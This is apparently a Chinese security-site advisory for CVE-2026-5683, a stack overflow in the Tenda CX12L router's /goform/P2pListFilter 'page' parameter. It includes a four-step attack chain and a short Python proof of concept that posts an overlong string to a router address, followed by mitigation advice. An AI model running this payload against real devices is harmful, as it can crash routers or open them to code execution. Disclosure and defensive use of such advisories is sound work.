CVE-2026-5683 CVSS 5.5 中危

CVE-2026-5683 Tenda CX12L 栈溢出漏洞

披露日期: 2026-04-06

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-5683

漏洞类型

栈溢出

CVSS评分

5.5 中危

攻击向量

邻接 (AV:A)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Tenda CX12L

漏洞概述

Tenda CX12L路由器16.03.53.12版本存在栈溢出漏洞。漏洞位于/goform/P2pListFilter接口的fromP2pListFilter函数中，因未正确过滤page参数导致。攻击者需在本地网络并具备低权限，通过发送恶意数据触发溢出，造成信息泄露或设备崩溃。

技术细节

该漏洞源于Tenda CX12L路由器固件处理/goform/P2pListFilter请求时的逻辑缺陷。fromP2pListFilter函数在接收用户输入的'page'参数时，直接将其拷贝到栈上的固定长度缓冲区，且未进行长度校验。当攻击者发送超长字符串时，会发生栈溢出，覆盖返回地址或关键变量。攻击需在本地网络（AV:A）进行，且需要一定权限（PR:L），但无需用户交互。成功利用可实现代码执行或拒绝服务，影响系统的机密性、完整性和可用性。

攻击链分析

STEP 1

侦察

攻击者在本地网络内扫描并识别Tenda CX12L设备。

STEP 2

认证

攻击者获取设备的低权限访问凭据（PR:L）。

STEP 3

漏洞利用

向/goform/P2pListFilter发送特制的POST请求，包含超长的page参数。

STEP 4

执行

触发栈溢出，导致设备崩溃或执行任意代码。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL
target_url = "http://192.168.0.1/goform/P2pListFilter"

# Vulnerable parameter 'page' with overflow payload
# Sending a long string to trigger stack-based buffer overflow
payload = {
    "page": "A" * 500  # Adjust length based on buffer size
}

try:
    # Sending POST request to trigger the vulnerability
    response = requests.post(target_url, data=payload)
    print(f"Status Code: {response.status_code}")
    if response.status_code == 200:
        print("Request sent, check device for crash or behavior change.")
except Exception as e:
    print(f"An error occurred: {e}")

影响范围

Tenda CX12L 16.03.53.12

防御指南

临时缓解措施

在官方补丁发布前，建议用户将设备置于隔离网络中，修改默认管理密码以增加攻击难度，并严格限制能够访问路由器管理页面的IP地址范围。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5683
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5683
3 Details https://www.cvedetails.com/cve/CVE-2026-5683/
4 VulDB https://vuldb.com/cve/CVE-2026-5683
5 Link https://github.com/cve-a/lvdan/issues/1
6 Link https://vuldb.com/submit/792777
7 Link https://vuldb.com/vuln/355510
8 Link https://vuldb.com/vuln/355510/cti
9 Link https://www.tenda.com.cn/

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表